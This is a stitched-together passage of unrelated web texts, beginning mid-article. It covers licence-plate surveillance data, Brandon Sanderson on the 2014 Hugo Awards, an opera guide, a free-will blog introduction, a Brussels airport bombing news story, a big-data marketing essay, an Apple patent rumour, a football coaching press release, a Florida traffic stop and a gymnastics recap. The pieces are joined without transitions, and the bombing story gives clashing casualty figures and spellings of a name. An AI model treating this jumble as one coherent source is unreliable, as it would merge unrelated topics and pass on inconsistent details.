Vigilant brags that it has more than 4.5 billion location data points in its commercial server (collected by vehicle repossession contractors), plus millions more in its law enforcement ALPR server. The unverified claim that it has fended off attacks so far is of little comfort. If Sony can be hacked, if the Federal Office of Personnel Management can be hacked, if even the digital intrusion specialists at Hacking Team can be hacked—then it may only be a matter of time before Vigilant's defenses fail.
Throughout the discussion, the Vigilant VP explained that government agencies are given control over how long data is stored and who it can be shared with through their software inferface. However, also during the hearing, the council learned that the program had been adopted without the police department taking the time to propose any kind of policies for controlling the data.
The Kyle City Council did the right thing by its constituents by ending the program. Now it's time for other jurisdictions to follow suit and reexamine the deals they've signed with ALPR companies to ensure they're putting privacy over surveillance snake oil.
For those who haven't yet seen the results of the 2014 Hugo Awards, they have been posted here. The Wheel of Time, despite displaying a fine showing for first place votes, ultimately did not prevail in winning a Hugo Award. (Though Mary's excellent novelette, “The Lady Astronaut of Mars,” did win—so congrats! And Julie Dillon, whose art graces the cover of Shadows Beneath among many other works, picked up a well-deserved Hugo Award for Best Professional Artist.)
The first post online I saw regarding this was someone commiserating toward me that I'd been robbed. While I appreciate this sentiment, and this fan's enthusiasm, I don't feel the same way. I think it's incredible we got onto the ballot in the first place, and I think we did very well. We were not “robbed.” This is how the Hugos work—the fans decide what is worthy, and—by definition—that is the piece that deserves the award.
This is a good thing. The award—as I've blogged about before—belongs to the fans. In addition, the Hugos have a built-in failsafe against people swinging in and voting only for one author, rather than reading extensively in the category. (It comes in the form of Instant Run-Off voting, which is explained here.) While The Wheel of Time got a lot of votes for first place, not many people ranked us second or third. This means that while some people really, really love The Wheel of Time, the majority of voters didn't. (Or, the people who ranked us second also ranked Ann Leckie's book first.)
More likely, though, I have a hunch that many readers just didn't have time to read the entire series by the deadline. Epic fantasy novels have a tough time at the Hugos. The Lord of the Rings, famously, lost to Foundation. Volumes of A Song of Ice and Fire have lost on three separate occasions, while Guy Gavriel Kay (in my opinion, the greatest living author of epic fantasy) hasn't ever even been nominated.
I don't think this is the result of some conspiracy, though the award—which is in the shape of a rocket ship—does tend to favor science fiction. I do think, however, that the length of epic fantasy books and series work against them in regards to awards. Hugo voters, historically, have been a responsible lot—but asking them to read ten thousand or so pages before voting in a category was a bit of a stretch.
Reading, digesting, and keeping abreast of an epic fantasy series is a time-consuming process, which sticks us with a catch-22 when it comes to awards. If volumes get nominated on their own, as George R.R. Martin's were, they can't be read alone, and have a handicap because they're only one slice of a larger story. If they get nominated as a single story (as The Wheel of Time did) then they're just too long to read in time for the voting. (Not to mention the controversy of having a series voted in the “novel” category.)
This isn't to say fantasy novels in a series can't win. (Harry Potter and the Goblet of Fire did win, as did Paladin of Souls by Lois Bujold.) But in the long run, I always thought we were an underdog here, and I'm actually pleased at the showing. (We ranked significantly higher than “No Award,” which means that the majority of fans did think we deserved the award, just not as much as other pieces did.)
I'm fully confident that The Wheel of Time was, and is, worthy of award recognition. Robert Jordan was an amazing man, and a fantastic author who inspired an entire generation of writers and readers. I'm honored to have been part of the series, and honored that the Hugo voters gave us a nomination in the first place. Truly, this was a great way to recognize him, and I sincerely appreciate the nod from fandom.
Congratulations to all the winners! I look forward to seeing you all in Spokane next year.
Brandon
On 25 August 1830, a riot broke out during a performance of
Daniel-François Auber's La Muette de Portici in Brussels. The disturbance was carefully timed to start during the duet Amour sacré de la Patrie, and by the end of the performance, the Belgian revolution, ensuring the country's eventual independence, had begun. Opera has brought people to the barricades, helped to overthrow monarchies and governments, and to end occupations and empires. Many of its composers believed, and still believe, in its ability to change the structures of society, and politicians in turn have believed in its potential for both ideological justification and propaganda. This week, our five operas take on the establishment, asking questions that are as relevant now as when they were written.
Mozart: Le Nozze di Figaro
Le Nozze di Figaro is so closely bound up with the mood and thought of Europe on the eve of the French Revolution that Georg Solti's Paris performance, televised on July 14 (Bastille Day) 1980, seems in many ways the most appropriate choice for it. It features three of the greatest Mozart divas of of its day - Gundula Janowitz as the Countess, Lucia Popp as Susanna and Frederica von Stade as Cherubino - alongside José Van Dam's spirited yet level-headed Figaro and Gabriel Bacquier's brutally unpleasant Count. The production, by the progressive Italian director Giorgio Strehler, plays it very straight, but with quiet anger and a painstaking attention to detail. For something radically different, try Claus Guth's 2006 Salzburg staging, in which the opera is re-invented as an internalised psychodrama that owes much to the films of Ingmar Bergman. It won't be to everyone's taste, but it's wonderfully conducted by Nikolaus Harnoncourt, while Bo Skovhus and Dorothea Röschmann realise the Almavivas' marital hell more vividly than any other singers I know.
Beethoven: Fidelio
Jürgen Flimm's 2004 Zurich Opera production of Fidelio sets Beethoven's
only opera firmly during the Napoleonic wars, which were roughly contemporaneous with the period (1805-1814) of its composition. In evoking the political convulsion that accompanied its genesis, Flimm emphasises that the opera is not only a demand for freedom and individual dignity, but is also a reminder of the lengths to which we must sometimes go in order to achieve them. Camilla Nylund is the single-minded, self-controlled Leonore doggedly struggling to rescue Florestan (Jonas Kaufmann, in one of his greatest performances) from Alfred Muff's sadistic, even Sadean Pizarro. Note how Rocco (László Polgár) and Jaquino (Christoph Strehl) are morally compromised by their collaboration, willing or otherwise, with Pizarro, while Marzelline (Elisabeth Rae Magnuson) is repeatedly in danger of becoming a casualty of Leonore's quest. Nikolaus Harnoncourt's conducting, meanwhile, is idiosyncratic but awesome.
Verdi: Don Carlo
Facebook Twitter Pinterest Part I
Verdi's name was synonymous in his lifetime with both the ideology and realisation of Italian independence, and his output as a whole constitutes opera's most extended analysis of the conflict between the rights of the individual and the forces of church and state that seek to control them. His immense adaptation of Schiller's Don Carlos, comparatively unsuccessful in his lifetime, is now regarded my many as the most comprehensive statement of his political concerns, though nothing in Verdi's humanism is such that he is able to extend to the tyrannical figure of Philip IV of Spain the same compassion he extends to his effective victims.
Facebook Twitter Pinterest Part II
The upload above is of the famous 1978 La Scala production, conducted at white heat by Claudio Abbado, with Plácido Domingo and Margaret Price sounding particularly glorious as Carlo and Elisabetta. The great Russian bass Yevgeny Nesterenko is the troubled, deeply affecting Philip, his compatriot Elena Obraztsova, in one of her finest performances, the majestic Eboli. Giorgio Strehler's production abandons his more familiar naturalistic approach (as in Figaro, above) in favour of a series of slow, symbolic processionals that suggest the lives of individuals and nations caught up in the relentless progress of history.
Mussorgsky: Boris Godunov
Yevgeny Nesterenko in 1978, again, but this time at the Bolshoi Theatre in Moscow, in a powerhouse performance as Mussorgsky's Boris Godunov, the tsar who has murdered a child in order to obtain the throne, and whose mind and empire are both falling apart under the resulting psychological strain. He's haunting and unforgettable - watch his death scene from 2:29:55 onwards if you don't want to see the entire opera - as are Vladislav Piavko and the Soviet Union's star mezzo Irina Arkhipova as the Pretender Dmitri and Marina. Rarely has the most insincere love duet in the entire repertoire - both characters are manipulators on the make - sounded so beautiful. The production has all the painstaking historicity of Soviet productions of the time, and every role is superbly taken - a reminder of what a great company the Bolshoi was in its heyday. Purists might object to the edition, which seems to mix bits of Rimsky-Korsakov's version with Mussorgsky's original, and has some cuts and re-orderings. Nesterenko, as far as I'm concerned makes it essential viewing: for a fuller text and a more modern take, with the opera updated to the 20th century, and the emphasis very firmly placed on the politics of revolution and regime change, try Herbert Wernicke's 1998 Salzburg production, conducted by Claudio Abbado: you can watch it here.
Britten: Billy Budd
The work of a gay man and a pacifist, Billy Budd is nowadays most commonly viewed as either a study in sexual repression or as an analysis of the metaphysics of evil. The narrative, however, deals with a miscarriage of justice in the British navy in the aftermath of the French Revolution, when fear of mutiny was at its height, and the opera inveighs angrily against a system that confuses law with genuine justice and fails to protect those it is ostensibly designed to help. The upload is a BBC production from 1966, made in the days when the Beeb regularly recorded operas in the TV studio. Directed by Basil Coleman and conducted, superbly, by Charles Mackerras, it features beautifully modulated performances from Peter Glossop as Billy and Britten's partner Peter Pears as Vere. The real revelation, though, is Michael Langdon's Claggart, tremendously sung and often quite disturbingly malign. Coleman makes a virtue out of having to confine the whole thing to a studio, and the shipboard atmosphere is very claustrophobic. The production was shot - as indeed the opera was written - at a time when sex between men was a criminal offence in this country. Most recent productions have made more of the gay subtext, though we still find it here in Langdon's lingering gazes at Billy, and his hovering round his crew's hammocks while they sleep.
Other fine interpreters of the title role include Peter Mattei, Bo Skovhus and Nathan Gunn. For a different take on the story, watch Peter Ustinov's film of the Herman Melville story on which the opera was based: Ustinov himself plays Vere, opposite Robert Ryan's Claggart, and Terence Stamp's extraordinarily attractive Billy.
Do humans have free will? Philosophers have discussed and debated free will for thousands of years. The question used to be, "Do we get to decide our actions or does God dictate them?" Later it became, "Is our soul a separate entity from our body that tells our body what to do?" Today, science isn't in the business of testing for God or the soul, and we believe that the mind is a product and part of body. Thoughts are patterns of neurons firing in your brain.
Now, scientists are beginning to probe the connection between thought and action. In a series of blog posts over the coming week, I'll discover how far that research has come--and how far it has yet to go.
Part 1: Free Will in the Lab
Part 2: Is Free Will an Illusion?
Part 3: In Defense of Free Will
Part 4: Does Free Will Matter?
As individuals, we believe that our thoughts bring about our actions. First we ask a question to ourselves: "What shall I do now?" Next we make the decision: "I will bake a cake now." Finally, we perform the action; we bake the cake. We believe we baked the cake because of that inner dialogue. But what if the brain "decided" to bake the cake long before the inner dialogue gave voice and awareness to the decision? The brain may have been sending signals to the body to go get the flour before we even thought, "I will bake a cake"! If this is true, you were going to bake that cake all along, and your thoughts arose in order to explain your actions to yourself--the thoughts are, to torture a metaphor, just the icing on a cake that your brain baked before you ever knew it.
With modern science we have the ability to watch brains as they function, something the ancient philosophers could barely have imagined. Does this mean we can now finally figure out how free will works? Can scientists witness our decisions in action? Or will it turn out that free will is just an illusion? The results of experiments in the field and what they mean for free will is hotly debated. In this series, I hope to untangle the science from the semantics and the data from the dogma--without getting stuck in the mire of metaphysics.
Mason Wells, 19, was in the Brussels airport when the terrorist bombing happened on Tuesday. The Mormon missionary also survived the Boston bombing and the Paris attacks
An American Mormon missionary who was injured in the horrifying Brussels airport terrorist attack previously survived the Boston bombing and the Paris attacks.
ISIS has claimed responsibility for the double blasts, which left at least 34 people dead including three of the terrorists and nearly 200 people injured.
The State Department said Wednesday that at least 12 Americans have been injured in the attacks, including Mormon missionary Mason Wells, 19, his two colleagues, a U.S. Air Force officer and the serviceman's five family members.
The two airport terrorists, who it is believed blew themselves up in the bombing, were spotted on CCTV wearing black gloves.
It is believed those gloves contained detonators, which were worn on the terrorists' left hand.
A manhunt is underway for the third man who it is believed was with them and walked out of the airport moments before the blasts.
The bombs exploded nail-shrouded devices hidden in suitcases in the first of twin terror attacks on the Belgian capital.
Some of the shrapnel from those blasts hit Mason Wills.
And it is a similar technique used by the terrorists who attacked Paris, where Mason was last year when 130 people were killed.
The 19-year-old suffered a ruptured Achilles tendon, injuries from shrapnel and second- and third-degree burns on his face and hands after the bombing.
Scroll down for video
ABC News filmed Well's parents Kymberly (left) and Chad (right) when they made a phone call to him after the attacks
'It's a miracle he's alive. It's a blessing from God he's alive,' Chad Wells (right) said. Mr Wells promised to fly to Paris to see his son
Two missionaries who were with Mason also suffered injuries, but survived.
'This is his third terrorist attack,' Chad Wells, Mason's father, told ABC News.
'This is the third time that sadly in our society that we have a connection to a bomb blast
'We live in a dangerous world and not everyone is kind and loving.'
Chad said he and Mason were a block away from the finish line of the Boston Marathon, where the bombing took place, waiting for Mason's mother, Kymberly Wells, who was a runner.
'It had shaken their bodies and he had taken Mason to our hotel and said to stay there.
Mason (pictured, left) suffered a ruptured Achilles tendon, injuries from shrapnel and second- and third-degree burns on his face and hands after the bombing, but is expected to recover and is in good spirits
Mason (left) was with Joseph Empey (right) at the time of the attack. Joseph was also severely injured but is alive and recovering from his injuries
The 20-year-old (right, pictured with Mason, left) suffered second-degree burns to his hands, face and head and had surgery for shrapnel in his legs
'Mason was very calm and composed,' Kymberly told ABC News.
Mason is currently in a Belgian hospital and is expected to make a full recovery, he told his parents. He was at 'ground zero' of the blast zone when the bombs went off.
ABC News was there when Mason's parents spoke to him from the hospital. Chad Wells promised to get on the next flight to Paris to visit his son.
'I don't feel like you need to come to Europe but I'm not gonna stop you if you guys...if you want to, Dad,' Mason says during the call. 'The burns aren't too bad at all, so they're pretty sure they're not gonna scar.'
Mason's mother's voice breaks as she asks her son how long he'll be in the hospital, and he says weeks.
'It's a miracle he's alive. It's a blessing from God he's alive,' Chad Wells said. 'He's just grateful to be alive, to have survived this, we're grateful that he survived such a horrible thing, because being right there at ground zero, and right next to the attack - and to survive - is nothing short of a huge miracle.'
Richard Norby, 66, (left) was on a missionary trip with the boys when the blasts went off. He has also been hospitalized
Families of the two younger missionaries said they have spoken to the men and they are awake and grateful for their lives
Chad said a Mormon official relayed to the Wells family that Mason, 'despite being on the ground and bleeding actually had a sense of humor and remained calm through the situation'.
'Mason has always assured us that he is safe and careful.
'I told him first and foremost always be aware of your surroundings, please be very careful when you're traveling be very observant to people around you,' Kymberly said.
The teen was also in Paris last year during the attacks.
'He shared with us that he was extremely close to the blast where he was burned by it,' Chad said.
'It's a blessing from God he's alive.'
Joseph Empey, who was with Mason, was also injured in the attack.
The 20-year-old was treated for second-degree burns to his hands, face and head.
Two twin explosions tore through the Brussels Airport on Tuesday killing 14. At a nearby metro station another blast killed 20 people. Nine Americans have been confirmed injured, but many are still unidentified
He also had surgery Tuesday for shrapnel injuries to his legs, but his family said in a statement that the is recovering and is grateful and in good spirits.
Joseph and Mason were at the airport with 66-year-old Richard Norby when they were wounded by an explosion.
A fourth missionary from France, Fanny Rachel Clain, was in a different location at the airport and was hospitalized with minor injuries.
Also among the Americans injured is Karen Northshield, a personal trainer living and working Brussels.
Friends originally reported her missing on Tuesday, but on Wednesday they found out she was being treated at a local hospital.
Paul Tucker, a personal trainer from the UK who works with Northshield in Brussels, told the Telegraph: 'I have been told this morning that Karen is in hospital in intensive care. She is alive but we don't know her condition or her injuries.
'I think she was flying back to the U.S. for the Easter holidays. She has a sister in Brussels who is with her in hospital. It's very upsetting but that's all I know. I don't know what state she is in in intensive care.'
Karen Northshield, an American personal trainer living in Brussels, is being treated for injuries at the hospital
An eyewitness said the blasts were so powerful that victims were thrown in the air, leaving the floor strewn with bodies, limbs and debris. Among the 14 dead inside the airport was said to be a man holding a baby.
There were reports of gunfire and shouts of God is great in Arabic. Police reportedly later found two AK-47 rifles and an unexploded suicide bomb vest.
Brussels remains on lockdown today with police desperately carrying out a series of anti-terror raids in a city which has already been deemed a 'clearing house for jihadism'.
First picture: These three men, pretending to be air passengers, are believed to the terrorists who have carried out the Brussels airport. The two suspected suicide bombers on the left were both wearing black gloves - which the Belgian media says would have hidden the triggers for their explosive vests. The third suspect in the hat is believed to still be on the run after dropping his nail bomb
More jihadis have traveled from Belgium to fight for ISIS in Syria and Iraq than have gone from any other European country.
In Brussels, along with Mason, others, like NBA Hall of Fame star Dikembe Mutombo, survived the horrifying bombing on Tuesday.
Mutombo, who was returning from a visit to the hospital in Kinshasa his foundation opened, told CNN he had been asleep in a passenger lounge when the airport was attacked.
'I heard people start screaming and everyone start running,' Mutombo said.
'I was napping and I was, like, what's going on? I thought it was a joke. And a lady said, 'Everybody out, everybody out. We have to go. We have to go. A lot of people are bleeding downstairs. A lot of people are hurt'.'
One data a time is big data at culmination – A thorough analysis why big data requires small data
Unless you had been living inside the caves since past few years, you must have heard how big data – the shiny new catchphrase of the marketing world – has literally taken over the world. Bit by bit, step over step, day after day; big data is only growing bigger and it is expected to streamline every single spectrum of the marketing world. It aims to regularize order, bring simplicity and improve accountability and transparency in the way the world works – with the most lethal power ever invented – data
Big data have had tremendous press (both online and offline) coverage – so much so that – the information surplus often creates confusions and misinterpretation. One quote that best summarizes this point – even if you have read it elsewhere earlier – is this:
Among many confusions or should I say misinterpretations, one apparent theory is big data is big data and it is vast, huge, uncontrolled and magnificent. While part of the statement is a fact- there are many things about it that many of us need to rethink, re understand and re conceptualize.
First, if we say big data is all about big data; we are dragging it into the hole of identity crisis.
Data scientists – the cool gentle folks with six-figure income of the century – dive into the data ocean of pinpointed information and distill it into highly specific and actionable insights ready for immediate consumption for marketing purpose. The data serves internal customers, refining, filtering, clustering and refreshing it every time it is processed to ensure it always is relevant.
However, when they process the pool of endless information, they are actually dealing with single subset of meaningful small data that collectively constitute the broader picture – big data
Why big data is about small data/ why big data needs small data
So, small data when clubbed together becomes big data. In order to get into the basic of it's essence, let us cluster the topic of analysis:
Small data and information
Why small data is important with example
Challenge of expressing emotion
Bragging of information
Information and insight
Small data is data in a specific set of volume and in regulated format that is informative and actionable; allows the stakeholder of it to easily access it and then use it step by step.
If small data does not pinpoint basic information, big data set is non-existent
Small data is a specific set of datasets; which is populated with extremely specific attributes. It is used and analyzed to measure the present state and conditions or may be generated by pinpointing larger datasets.
Small data is important because it can trigger events based on what is happening now. The events can then be merged with behavioral information derived from specifically clustered sources such as machine learning algorithms. So, big data is almost non-existent without the filler offered and provided by small data.
Think about a wind turbine as an example of small data – how it compliments big data patterns
It has a range of sensors strategically mounted on it to analyze and assess many activities including speed, wind movement, velocity, temperature, vibration etc; to name a few. The turbine's blade is so programmed that based on the feedback provided by small data, it can adjust to changing wind condition. These small data sets are interlinked with large data lakes where machine learning start to understand pattern from the information gathered from small data sets in order to accomplish a range of duties; namely predicting the shelf life of a part, helping a product with basic maintenance for strategic functioning etc; to name a few.
It is very challenging to express emotions using big data compared to small data
Let us take an example – Small data is more powerful than big data. We will give an example to prove it. More than a decade ago, Lego Company believed instant gratification generation would kill their product and hence they changed the size of their product – small, tiny bricks – to huge building blocks. Very soon, the company was almost going into a bankruptcy mode. Later; they changed the size of the bricks back to tiny ones, invented the Lego Movie and today is number one.
The problem with organization is they can't take decision in the absence of near perfect data; they brag they have the lot of data – which if not used and only talked about – actually a dumb data.
Today organizations brag they have data – ocean of data – which can be leveraged on to get meaningful set of specialized and insightful information. But do they actually use it?
Huge set of data means lack of near perfect data – either because there is the lack of skilled resources to extract value from it or skilled people do not necessarily know how to extract useful information in a specific environment from that data set. In this case, big data turns out to be dub data.
That is exactly where they need to value small subset of pinpointed information in order to use them for organizational value. In other words, that's why big data needs small data!
Big data provides information. Small data provides insight
Big data as we mentioned is made up of small data. Small data is the bit sized; evenly balanced; and strategic; ready to become useful information – offers insight – pinpointed statistics and basic patterns which when collectively processed into greater and streamlined information system with the help of tools and technologies becomes big data.
So, emotion and context which generate value and meaning can be sourced from small data rather than accumulated information reflected through big data.
To make total sense in terms of applicability and usefulness; big data therefore needs the adequate helping of small data. Without small data, big data is non-existent; One data a time is big data at culmination!
Rumors of Apple's entrance into the world of tablets were brought back into sight this morning as a recent Apple patent revealed the possible design for an upcoming tablet offering from Cupertino. You'll likely recall rumors that flew around in late December, originating from three separate TechCrunch “sources close to Apple”, stating that Apple was working on a larger-scale iPod Touch-like device slated for a Fall 2009 release. While the patent illustrations don't necessarily depict a bulked up iPod Touch as described by TechCrunch, they certainly do appear to feature a touchscreen computer with no physical keyboard in sight. A few of the illustrations in Apple's patent application show a bottom plate on the device that appears to have lines very uncharacteristic of Apple's current crop. As such, we're lead to believe this device, if it ever sees the light of day, may possibly be branded entirely separately from Apple's current offerings (as opposed to being dubbed, say, MacBook Touch). Well, it's no ModBook Pro but it'll certainly turn heads and have digital designers dying to break out their credit cards.
[Via Electronic Pulp]
Read
NOTRE DAME, Indiana - Former University of Notre Dame assistant coach Brian Polian , who spent the last four years as the head coach at Nevada, has been named Fighting Irish special teams coordinator.
"I'm thrilled about the opportunity to return to Notre Dame," said Polian. "This is a very special University and football program. I want to thank coach Kelly and Jack Swarbrick for the opportunity to re-join the Fighting Irish family. Laura and I are looking forward to coming back to this wonderful community. I'm excited to go to work, get to know the terrific student-athletes and prepare for a great 2017 season."
"Brian not only brings a successful history of coaching special teams, but he's also considered one of the nation's top recruiters," said head coach Brian Kelly . "He simply understands Notre Dame, what it's about, and the type of student-athlete that we need to succeed at the highest level. I'm extremely excited to have Brian join this program, and our players will benefit from his mentorship, passion, energy and enthusiasm -- both on and off the field."
Polian, who also coordinated special teams at Stanford and Texas A&M, previously spent five years on the Notre Dame sidelines (2005-09). In addition to coordinating Irish special teams, Polian coached both defensive backs and linebackers.
During his tenure at Notre Dame, Polian earned a number of honors as one of the top recruiters in the country and was a nominee for the American Football Coaches Association (AFCA) Assistant Coach of the Year in 2008. His special teams units set a number of school records and the Irish went to a pair of BCS bowl games.
In 2008, Polian guided the Notre Dame kickoff return defense to a nation leading 16.47 yards per return -- even more impressive when you consider the figure came on 59 kickoff return attempts. In fact, only one FBS school since 2003 has posted a better kickoff return defense with at least 59 kickoff return attempts.
Polian owns an impressive football pedigree that also includes coaching stops at Texas A&M, Stanford, UCF, Buffalo, Baylor and Michigan State as part of a 21-year career.
In his four years as head coach at Nevada, Polian led the Wolf Pack to consecutive bowl games in 2014 and 2015, including a victory in the inaugural '15 NOVA Home Loans Arizona Bowl -- Nevada's fifth bowl win in school history. He guided Nevada to 22 wins, 26 individual All-Mountain West honors and unprecedented academic honors.
Polian helped guide Nevada to 41 Academic All-MW honors in his tenure (2016 honors have yet to be announced), two National Football Foundation (NFF) Hampshire Honor Society members and a NFF National Scholar-Athlete, which is the most prestigious scholar-athlete award in college football. The Wolf Pack, which had a program-record 21 student-athletes earn 2015 Academic All-Mountain West (MW) honors, also recorded a program-best combined GPA of 3.05 in the 2015 spring semester.
Nevada posted a 7-6 overall record with a 4-4 mark in Mountain West play in 2015, marking consecutive seasons Polian led the Wolf Pack to a winning record. Nevada used a lethal ground-and-pound offense in '15, as James Butler and Don Jackson each eclipsed 1,000 yards rushing. The Wolf Pack were one of just three teams in the nation with a pair of 1,000-yard rushers, while Nevada ranked 25th in FBS in rushing (210.6 rushing yards per game). On defense, the Wolf Pack lowered their points allowed per game average for the second straight year. Ian Seau earned first team All-MW honors, was named MVP of the Arizona Bowl and led the conference with 10 sacks. Polian's decision to play true freshman DB Dameon Baber also paid dividends, as Baber ranked seventh in the nation with six interceptions and earned second team All-MW accolades.
In 2014, Polian turned the tide from year one to year two of his tenure as the program reached new heights on and off the field. Nevada registered a 7-6 record and returned to a bowl game, playing in the 2014 R+L Carriers New Orleans Bowl. The Wolf Pack defeated Pac-12 foe Washington State, scored impressive road wins at BYU, Hawaii and San Jose State, and capped the regular season with a dominating win at UNLV.
Polian also helped nine student-athletes earn 2014 All-Mountain West honors, including Cody Fajardo, who became just the second player in NCAA history to pass for 9,000 yards and rush for 3,000 yards in a career.
In June of 2015, Polian was selected to represent the Mountain West Conference on the inaugural College Football Officiating Competition Committee. The committee, which consists of 12 members from across the nation, is influential in the discussion and implementation of the rules of college football.
Polian came to Nevada after a year as the special teams coordinator and tight ends coach at Texas A&M, which capped an 11-2 season in 2012 with a win over Oklahoma in the Cotton Bowl and an historic Heisman Trophy for then-freshman quarterback Johnny Manziel.
Polian has coached on both sides of the ball and earned a reputation as one of the top recruiters in the nation in previous coaching roles at Stanford (2010-11), UCF (2004) and Buffalo (2001-03).
Polian's two-year run with Stanford was marked by a pair of BCS bowl appearances and two of the top recruiting classes in school history. He served as the special teams coordinator and recruiting coordinator while also coaching the safeties with the Cardinal.
Polian spent one season at UCF as the recruiting coordinator and running backs coach, and spearheaded recruiting classes that led to the Knights' bowl appearance in 2005. Prior to UCF, he coordinated special teams and coached running backs at the University at Buffalo for three seasons after a previous tenure (1998) with the Bulls. Polian also worked as a graduate assistant for Nick Saban at Michigan State (1997) and then spent two seasons as a graduate assistant at Baylor (1999-2000).
A native of The Bronx, New York, Polian graduated from at St. Francis High School outside of Buffalo. He went on to play linebacker at John Carroll University from 1993-96. He earned a bachelor's degree in history from John Carroll in 1997 and received his master's in education from Baylor in 2000.
Polian comes from a notable football family. His father, Bill, was the general manager and architect of the Super Bowl teams of the Buffalo Bills in the 1990s and later, as the team's president, oversaw the Indianapolis Colts' two Super Bowl appearances and their championship in 2006. In August of 2015, Bill Polian's career culminated with his enshrinement into the Pro Football Hall of Fame. Polian's two brothers, Chris and Dennis, both work in the NFL.
Polian and his wife, Laura, have a son, Aidan, and a daughter, Charlotte.
The Polian File Hometown Buffalo, New York College John Carroll University (History, 1997) Wife Laura Children Aidan and Charlotte
Playing Experience 1993-96 John Carroll Linebacker
Coaching Career 1997 Michigan State Graduate Assistant (Offense) 1998 Buffalo Tight Ends/Assistant Offensive Line 1999 Baylor Graduate Assistant (Defense, Special Teams) 2000 Baylor Graduate Assistant (Defense, Special Teams) 2001 Buffalo Running Backs/Special Teams Coordinator 2002 Buffalo Running Backs/Special Teams Coordinator 2003 Buffalo Running Backs/Special Teams Coordinator 2004 UCF Running Backs/Recruiting Coordinator 2005 Notre Dame Head Special Teams Coach/Defensive Backs Assistant 2006 Notre Dame Head Special Teams Coach/Linebackers Assistant 2007 Notre Dame Inside Linebackers/Special Teams 2008 Notre Dame Special Teams Coordinator 2009 Notre Dame Special Teams Coordinator 2010 Stanford Special Teams Coordinator/Safeties 2011 Stanford Special Teams Coordinator/Recruiting Coordinator/Safeties 2012 Texas A&M Special Teams Coordinator/Tight Ends 2013 Nevada Head Coach 2014 Nevada Head Coach 2015 Nevada Head Coach 2016 Nevada Head Coach
Bowls Coached 1996 Aloha Bowl 2005 Fiesta Bowl 2006 Sugar Bowl 2008 Hawai'i Bowl 2010 Orange Bowl 2011 Fiesta Bowl 2012 Cotton Bowl 2014 New Orleans Bowl 2015 Arizona Bowl
The Florida Highway Patrol has released dashcam video footage of a traffic stop that turned into a wrestling match inside a car between a passenger and a trooper who eventually fired his Taser to subdue the man.
Arrested in the Aug. 4 incident along the northbound lanes of Interstate 75 near Royal Palm Boulevard in Weston was Marcel Brown, 26, of Naples. He was charged with failure to obey police; not using a seat belt; battery on an officer; and resisting an officer with violence.
Both Brown and Trooper Sergio Chinchilla were taken to Cleveland Clinic in Weston and treated for minor injuries following the fracas, FHP spokesman Sgt. Mark Wysocky said.
"This shows how a simple traffic stop can escalate into what it did," said Wysocky. "It was a simple seat belt [citation] and it sent two people to the hospital."
The incident began just after 7 p.m. when Chinchilla pulled over a white Ford on suspicion of speeding, FHP said. The car was driven by Jacob Martinez, 19. Brown was in the front passenger seat.
Broward Sheriff's Office, courtesy Marcel Brown (Broward Sheriff's Office, courtesy) (Broward Sheriff's Office, courtesy)
The video shows Chinchilla walking up to the passenger side of the car and speaking to the occupants. Brown twice put his leg outside the car, attempting to get out, Chinchilla wrote in his report.
When Brown refused to provide his ID "reference no seat belt," Chinchilla wrote in his report, the trooper said he opened the car door to place Brown under arrest.
Brown pushed Chinchilla away from the door, got out and the two men faced off on the shoulder of the road. While calling for backup, Chinchilla said, "I got the passenger back in the vehicle but he started to fight.
"I pushed the passenger against the seat and try to place handcuff[s] on him," the trooper wrote. "While trying to place handcuff[s] the passenger punched me in the face several times."
On the video, the car can be seen rocking back and forth as the two men tussle in the front seat.
After about a minute, Martinez got out of the car and seems to look on almost nonchalantly as the trooper and Brown continue fighting. Martinez pulls out his cellphone and appears to make a call.
Martinez makes no effort to intervene in the struggle.
Chinchilla said he warned Brown that he would use his Taser if he continued to fight. "I discharged my Taser on the passenger," he wrote. "The passenger finally stop fighting. I hold the passenger inside the vehicle against the seat back till backup arrived."
Appearing in court on Aug. 5, Broward County Judge John "Jay" Hurley set bond for Brown, a landscaper, at $7,625. Brown bonded out that same day, records show.
Martinez was not charged.
mwclary@tribune.com
Earlier today, Germany beat Romania by just about one full point at Länderkampf Kunstturnen in Obersiggenthal, Switzerland, highlighting just how much of a jam Romania could be in at World Championships next month.
Both teams used the athletes who should be set to compete in Nanning, with a few small alterations for Germany. As they are still deciding between two athletes for the sixth spot on their team, they chose to give Worlds team member Cagla Akyol the day off in order to use this meet as a trial for Elisabeth Seitz on bars and Leah Griesser on beam and floor.
Larisa Iordache performed wonderfully, winning the all-around, vault, beam, and floor titles. But she will have to keep up consistent all-around performances in Nanning, putting the bulk of this team's weight on her tiny shoulders, which could be too much pressure for her.
The team didn't perform horribly, exactly, and had this been a three count situation like it will be at Worlds (it was four count here), Romania would have defeated Germany by three tenths. That doesn't inspire much confidence, as two years ago Romania had ten full points over Germany.
Of course, they lost superstars Sandra Izbasa and Catalina Ponor to retirement, Diana Bulimar is injured, and the bulk of their junior talent won't join the senior ranks until next year, so they're not officially crying for help just yet. This year is little more than a blip on the radar for them, but it still has the potential to be painful at Worlds, where Germany, Japan, Italy, and especially Great Britain have the potential to outscore them.
Looking at the numbers, Romania has big potential on vault (where they have two DTYs) and beam (where Iordache and Andreea Munteanu have incredible routines). They're good, if not fantastic, on floor…but their bars is absolutely dismal and brings their event total average down by a full point.
Iordache looks much improved, and earned a 14.45 in the competition today, good enough for third place behind Germany's insanely talented bar workers. But the next-highest score was Stefania Stanila's 12.95, and behind her, Ana Maria Ocolisan brought in a 12.4 while Paula Tudorache earned a 10.2.
Not counting that 10.2 would have helped in the team final, so the odds do look better in a three-up situation, but honestly, not by much. They are going to have to do absolutely everything they can in qualifications at Worlds to make sure they're at the top, though at this point, knowing how many other teams are bringing to the table, it's not going to be easy for them to stay inside that Big Four bubble.
What about Germany? They're not exactly without problems, but they have no major margin of error like Romania has on bars. Beam and floor aren't exactly outstanding, but they can put up three very clean vaults and their bars are fantastic…between Lisa Hill, Kim Bui, and Sophie Scheder, they're very solid on this event, but possibly having Elisabeth Seitz back just gives them added security.
Seitz didn't have her best bar routine today, but it was her first routine after a very long time away from competition due to multiple injuries. She must still contend for the final spot on the German World Championships team along with Leah Griesser, who competed today on beam and floor.
The German team needs beam and floor more than they need an additional bar worker, but I'm not fully sold on Griesser. She was fifth out of the five Germans who competed on beam with just an 11.45, and her floor was okay but not enough to save them – she brought in a 13.15, the third best for the Germans behind Bui and Pauline Schäfer. However, Lisa Hill didn't compete on floor for some reason, and Cagla Akyol wasn't at this meet. Both can contribute higher scores here than Griesser can.
